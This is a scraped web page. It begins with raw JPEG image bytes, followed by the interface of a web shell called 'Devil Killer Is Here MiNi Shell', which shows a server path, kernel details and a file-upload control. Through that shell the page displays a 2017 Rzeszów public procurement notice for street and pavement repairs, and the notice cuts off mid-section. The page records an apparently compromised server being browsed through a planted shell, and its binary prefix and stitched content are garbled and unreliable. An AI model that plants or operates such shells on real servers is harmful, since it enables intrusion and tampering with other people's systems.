JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170424/72119-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.erzeszow.pl' target='_blank'>http://bip.erzeszow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 72119 - 2017
              z dnia 2017-04-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rzeszów: Wykonanie robót budowlanych polegających na remoncie ulicy Konwalii oraz wykonanie robót budowlanych polegających na wykonaniu chodnika przy ulicy Krokusowej w Rzeszowie <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>Postępowanie prowadzi Urząd Miasta Rzeszowa w imieniu i na rzecz zamawiającego Miejskiego Zarządu Dróg w Rzeszowie.Podmiot, któremu zamawiający powierzył prowadzenie postępowania: Urząd Miasta Rzeszowa, Wydział Centralnego Zamawiającego 35-064 Rzeszów, ul. Joselewicza 4  <br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miasto Rzeszów - Urząd Miasta  Rzeszowa, krajowy numer identyfikacyjny
              65061400000, ul.
              Rynek 
              1,
              35064  
              Rzeszów, woj.
              podkarpackie, państwo
              Polska, tel.
              178 754 636, e-mail
              zampub@erzeszow.pl, faks
              178 754 634.
              <br />
              Adres strony internetowej (URL): bip.erzeszow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bip.erzeszow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.erzeszow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta winna być dostarczona w formie pisemnej osobiście lub za pomocą posłańca lub operatora pocztowego<br />
                Adres:
                <br />Urząd Miasta Rzeszowa Wydział Centralnego Zamawiającego 35-064 Rzeszów,ul. Joselewicza 4 pok. 13</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie robót budowlanych polegających na remoncie ulicy Konwalii oraz wykonanie robót budowlanych polegających na wykonaniu chodnika przy ulicy Krokusowej w Rzeszowie <br /><b>Numer referencyjny: </b>CZ-I.271.32.88.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na remoncie ulicy Konwalii oraz wykonanie robót budowlanych polegających na wykonaniu chodnika przy ulicy Krokusowej w Rzeszowie 

Zakres zamówienie obejmuje:
Remont ul. Konwalii
REMONT NAWIERZCHNI CHODNIKÓW			
-	rozebranie krawężników betonowych na podsypce cementowo-piaskowej wraz z transportem na wskazane miejsce przez zamawiającego do 15 km - 560,00 mb
-	rozebranie obrzeży trawnikowych 8x30cm na podsypce piaskowej - wraz z transportem na wskazane miejsce przez zamawiającego do 15km - 50,00 mb
-	rozebranie chodników z kostki brukowej, ułożonych na podsypce piaskowej z załadowaniem na palety wraz z transportem na wskazane miejsce przez zamawiającego do 15 km - 160,00 m2
-	rozebranie chodników z płytek betonowych, ułożonych na podsypce piaskowej z załadowaniem na palety wraz z transportem  na wskazane miejsce przez zamawiającego do15 km - 150,00 m2
-	rozebranie nawierzchni z betonu, grubość nawierzchni do 15 cm, wraz z transportem urobku na wskazane miejsce przez zamawiającego do 15 km - 60,00 m2
-	ustawienie krawężników wraz z wykonaniem ław, betonowe wystające 15x30cm, ława betonowa 0,07m3/mb, wraz z oporem - 560,00 mb
-	ustawienie obrzeży betonowych, 30x8cm, na ławie betonowej B-10, z oporem 0,03m3/mb, wypełnienie spoin zaprawą cementową - 50,00 mb
-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane ręcznie, kategoria gruntu II-IV - 460,00 m2
-	wykonanie chodników z kostki brukowej o grub. 6 cm., szarej na podsypce cementowo-piaskowej gr do 5 cm, spoiny wypełniane piaskiem - 460,00 m2
-	przełożenie nawierzchni z płyt ażurowych betonowych (miejsca postojowe) na podsypce cementowo-piaskowej gr. do 10 cm - 30,00 m2
-	przełożenie chodników z kostki brukowej o grubości 6 cm, szarej na podsypce cementowo-piaskowej do 5 cm, spoiny wypełnione piaskiem - 30,00 m2
-	przełożenie chodników z kostki kamiennej na podsypce cementowo-piaskowej, spoiny wypełnione zaprawą cementową - 20,00 m2
-	przełożenie progu zwalniającego z kostki brukowej gr. 8cm, na podsypce cementowo-piaskowej do 5cm,  o wymiarach 3,6*3,5m - 1,00 szt 
-	plantowanie obrobienie na czysto zieleńców, wykonywanych ręcznie o gr do 10cm wraz z dowiezieniem ziemi  z obsianiem mieszanina traw, kategoria gruntu I-III - 300,00 m2
-	aktualizacja mapy zasadniczej w formie cyfrowej oraz papierowej (pliki DWG i SHP) na żądanie zamawiającego - 1,00 szt.
REMONT NAWIERZCHNI JEZDNI		
-	rozebranie nawierzchni, masy mineralno-bitumiczne grubość 4cm, mechanicznie wraz z transportem urobku na wskazane miejsce przez zamawiającego do 15km - 1200,00 m2
-	regulacja pionowa krat ściekowych kanalizacji burzowej z wyminą rusztu na typ ciężki T-40 - 8,00 szt.
-	regulacja pionowa studni rewizyjnych z wymianą włazów na typ ciężki T - 40 na pierścieniu dystansowym - 25,00 szt.
-	regulacja pionowa zasuw wod-kan oraz gaz wraz z wymianą - 7,00 szt. 
-	oczyszczenie wraz ze skropienie nawierzchni drogowych asfaltem - 1200,00 m2
-	mechaniczne wyrównywanie istniejącej podbudowy mieszanką mineralno-asfaltową, standard I - 75,00 t
-	nawierzchnie z mieszanek mineralno-bitumicznych warstwa ścieralna, mieszanka asfaltowa KR 1-2, grubość warstwy po zagęszczeniu 5 cm - 1200,00 m2
 Remont ul. Krokusowej- chodnik
-	rozebranie obrzeży trawnikowych 8x30cm na podsypce piaskowej - wraz z transportem na wskazane miejsce przez zamawiającego do 15km - 60,00 mb
-	rozebranie nawierzchni zjazdów z kostki brukowej, ułożonych na podsypce piaskowej z załadowaniem na palety wraz z transportem na wskazane miejsce przez zamawiającego do 15 km  140 m2
-	rozebranie nawierzchni z płyt ażurowych, wraz z załadowaniem na palety i transportem  na wskazane miejsce przez zamawiającego do15 km - 20,00 m2
-	koryta o głębokości do 30 cm wykonywane na całej szer. jezdni lub chodników mechanicznie w gruntach kat. II-IV z transportem urobku na wysypisko do 15 km - 495,00 m2
-	regulacja pionowa studni rewizyjnych z wymianą włazów na typ ciężki T - 40 na pierścieniu dystansowym - 8,00 szt.
-	ustawienie obrzeży betonowych, 30x8cm, na ławie betonowej B-10, z oporem 0,03m3/mb, wypełnienie spoin zaprawą cementową - 330,00 mb
-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane ręcznie, kategoria gruntu II-IV - 495,00 m2
-	wykonanie warstwy odsączającej z piasku, grub. warstwy do 10cm po zagęszczeniu-495,00m2
-	wykonanie podbudowy z kruszywa łamanego - tłucznia kamiennego, grubość warstwy do 10 cm - 495,00 m2
-	wykonanie chodników z kostki brukowej o grub. 6 cm., szarej na podsypce cementowo-piaskowej gr do 5 cm, spoiny wypełniane piaskiem - 495,00 m2
-	przełożenie nawierzchni z płyt ażurowych betonowych (miejsca postojowe) na podsypce cementowo-piaskowej gr. do 10 cm - 10,00 m2
-	przełożenie chodników z kostki brukowej o grubości 6 cm, szarej na podsypce cementowo-piaskowej do 5 cm, spoiny wypełnione piaskiem - 50,00 m2
-	przełożenie krawężników betonowych o wymiarach 15x30 cm na ławie betonowej-100,00m
-	plantowanie obrobienie na czysto zieleńców, wykonywanych ręcznie o gr do 10cm wraz z dowiezieniem ziemi  z obsianiem mieszanina traw, kategoria gruntu I-III - 300,00 m2
-	aktualizacja mapy zasadniczej w formie cyfrowej oraz papierowej (pliki DWG i SHP) na żądanie zamawiającego - 1,00 szt.
3.	Szczegółowy opis przedmiotu zamówienia określa:

1)	Szczegółowe Specyfikacje Techniczne,
2)	Przedmiary robót dla każdej ulicy oddzielnie,
3)	wzór umowy.
- stanowiące załączniki do niniejszej SIWZ (dostępne w oddzielnych plikach zamieszczonych na stronie internetowej Zamawiającego)

<br /><br /><b>II.5) Główny kod CPV: </b>45233222-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 Pzp,  zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu podobnych robót budowlanych w wysokości do 87 393,27 zł netto.

1)	Określenie przedmiotu: 
Wykonanie remontu ulicy Konwalii, polegającego na wymianie krawężników betonowych, wymianie nawierzchni istniejącego chodnika na kostkę brukową, wykonaniu warstw masy bitumicznej na istniejącej nawierzchni jezdni.
Wykonanie remontu ulicy Krokusowej, polegającego na wykonaniu chodnika z kostki brukowej 

2)	Zakres robót budowlanych:
Remont ul. Konwalii

REMONT NAWIERZCHNI CHODNIKÓW	
-	rozebranie krawężników betonowych na podsypce cementowo-piaskowej wraz z transportem na wskazane miejsce przez zamawiającego do 15 km 
-	rozebranie obrzeży trawnikowych 8x30cm na podsypce piaskowej - wraz z transportem na wskazane miejsce przez zamawiającego  do 15km 
-	rozebranie chodników z kostki brukowej, ułożonych na podsypce piaskowej z załadowaniem na palety wraz z transportem na wskazane miejsce przez zamawiającego  do 15 km 
-	rozebranie chodników z płytek betonowych, ułożonych na podsypce piaskowej z załadowaniem na palety wraz z transportem  na wskazane miejsce przez zamawiającego  do15 km 
-	 rozebranie nawierzchni z betonu, grubość nawierzchni do 15 cm, wraz z transportem urobku na wskazane miejsce przez zamawiającego  do 15 km 
-	ustawienie krawężników wraz z wykonaniem ław, betonowe wystające 15x30cm, ława betonowa 0,07m3/mb, wraz z oporem 
-	ustawienie obrzeży betonowych, 30x8cm, na ławie betonowej B-10, z oporem 0,03m3/mb, wypełnienie spoin zaprawą cementową 
-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane ręcznie, kategoria gruntu II-IV 
-	wykonanie chodników z kostki brukowej o grub. 6 cm., szarej na podsypce cementowo-piaskowej gr do 5 cm, spoiny wypełniane piaskiem 
-	przełożenie nawierzchni z płyt ażurowych betonowych (miejsca postojowe) na podsypce cementowo-piaskowej gr. do 10 cm 
-	 przełożenie chodników z kostki brukowej o grubości 6 cm, szarej na podsypce cementowo-piaskowej do 5 cm, spoiny wypełnione piaskiem 
-	przełożenie chodników z kostki kamiennej na podsypce cementowo-piaskowej, spoiny wypełnione zaprawą cementową 
-	 przełożenie progu zwalniającego z kostki brukowej gr. 8 cm, na podsypce cementowo-piaskowej do 5cm,  o wymiarach 3,6*3,5 m 
-	plantowanie obrobienie na czysto zieleńców, wykonywanych ręcznie o gr do 10cm wraz z dowiezieniem ziemi  z obsianiem mieszanina traw, kategoria gruntu I-III 
-	aktualizacja mapy zasadniczej w formie cyfrowej oraz papierowej (pliki DWG i SHP) na żądanie zamawiającego
REMONT NAWIERZCHNI JEZDNI		
-	rozebranie nawierzchni, masy mineralno-bitumiczne grubość 4cm, mechanicznie wraz z transportem urobku na wskazane miejsce przez zamawiającego  do 15km 
-	 regulacja pionowa krat ściekowych kanalizacji burzowej z wyminą rusztu na typ ciężki T-40.
-	regulacja pionowa studni rewizyjnych z wymianą włazów na typ ciężki T - 40 na pierścieniu dystansowym 
-	regulacja pionowa zasuw wod-kan oraz gaz wraz z wymianą 
-	oczyszczenie wraz ze skropienie nawierzchni drogowych asfaltem 
-	mechaniczne wyrównywanie istniejącej podbudowy mieszanką mineralno-asfaltową, standard I 
-	nawierzchnie z mieszanek mineralno-bitumicznych warstwa ścieralna, mieszanka asfaltowa KR 1-2, grubość warstwy po zagęszczeniu 5 cm 
,,Remont ul. Krokusowej- chodnik
-	rozebranie obrzeży trawnikowych 8x30cm na podsypce piaskowej - wraz z transportem na wskazane miejsce przez zamawiającego  do 15km 
-	rozebranie nawierzchni zjazdów z kostki brukowej, ułożonych na podsypce piaskowej z załadowaniem na palety wraz z transportem na wskazane miejsce przez zamawiającego  do 15 km 
-	rozebranie nawierzchni z płyt ażurowych, wraz z załadowaniem na palety i transportem  na wskazane miejsce przez zamawiającego  do 15 km 
-	koryta o głębokości do 30 cm wykonywane na całej szer. jezdni lub chodników mechanicznie w gruntach kat. II-IV z transportem urobku na wysypisko do 15 km 
-	regulacja pionowa studni rewizyjnych z wymianą włazów na typ ciężki T - 40 na pierścieniu dystansowym 
-	ustawienie obrzeży betonowych, 30x8cm, na ławie betonowej B-10, z oporem 0,03m3/mb, wypełnienie spoin zaprawą cementową 
-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane ręcznie, kategoria gruntu II-IV 
-	wykonanie warstwy odsączającej z piasku, grub. warstwy do 10 cm po zagęszczeniu 
-	wykonanie podbudowy z kruszywa łamanego - tłucznia kamiennego, grubość warstwy do 10 cm 
-	wykonanie chodników z kostki brukowej o grub. 6 cm., szarej na podsypce cementowo-piaskowej gr do 5 cm, spoiny wypełniane piaskiem 
-	przełożenie nawierzchni z płyt ażurowych betonowych (miejsca postojowe) na podsypce cementowo-piaskowej gr. do 10 cm 
-	przełożenie chodników z kostki brukowej o grubości 6 cm, szarej na podsypce cementowo-piaskowej do 5 cm, spoiny wypełnione piaskiem 
-	przełożenie krawężników betonowych o wymiarach 15x30 cm na ławie betonowej 
-	 plantowanie obrobienie na czysto zieleńców, wykonywanych ręcznie o gr do 10cm wraz z dowiezieniem ziemi  z obsianiem mieszanina traw, kategoria gruntu I-III 
-	aktualizacja mapy zasadniczej w formie cyfrowej oraz papierowej (pliki DWG i SHP) na żądanie zamawiającego 
3)	Warunki na jakich zostaną udzielone zamówienia: Zamówienie zostanie udzielone w jednym lub kilku zamówieniach w przypadku, gdy zaistnieje potrzeba i Zamawiający będzie posiadał środki finansowe na realizację.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 105<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Przedmiot zamówienia należy wykonać w terminie do: 
1)	termin rozpoczęcia  - z dniem podpisania umowy
2)	termin zakończenia robót   90 dni  od dnia podpisania umowy;
3)	termin wykonania umowy  105 dni od dnia podpisania umowy
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	Wykonawca spełni warunek jeżeli wykaże że, nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał zamówienia na roboty budowlane polegające na ułożeniu nawierzchni z mas mineralno  bitumicznych w ilości co najmniej 600 m2 oraz przełożył chodniki lub ułożył nowe chodniki z kostki brukowej lub płytek chodnikowych w ilości co najmniej 500 m2

Zamawiający uzna, iż warunek powyższy zostanie spełniony także w przypadku gdy Wykonawca wykaże, iż wykonywał powyższe zamówienie na robotę budowlaną w ramach oddzielnych umów na wykonanie tych robót. 

Zamawiający uzna, iż warunek powyższy zostanie spełniony także w przypadku gdy Wykonawca wykaże, iż wykonywał powyższe roboty budowlane w ramach jednej umowy. 

Przez zamówienia wykonane należy rozumieć:
1)	zamówienia rozpoczęte i zakończone w ww. okresie
2)	zamówienia zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w ww. okresie.

b)	Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobą posiadającą uprawnienia budowlane*:
- kierownik budowy  posiadający uprawnienia budowlane w ograniczonym lub wyższym zakresie do kierowania robotami w specjalności inżynieryjnej drogowej*.

* Przez uprawnienia budowlane Zamawiający rozumie uprawnienia wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn.: Dz. U. z 2016 r., poz. 65).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
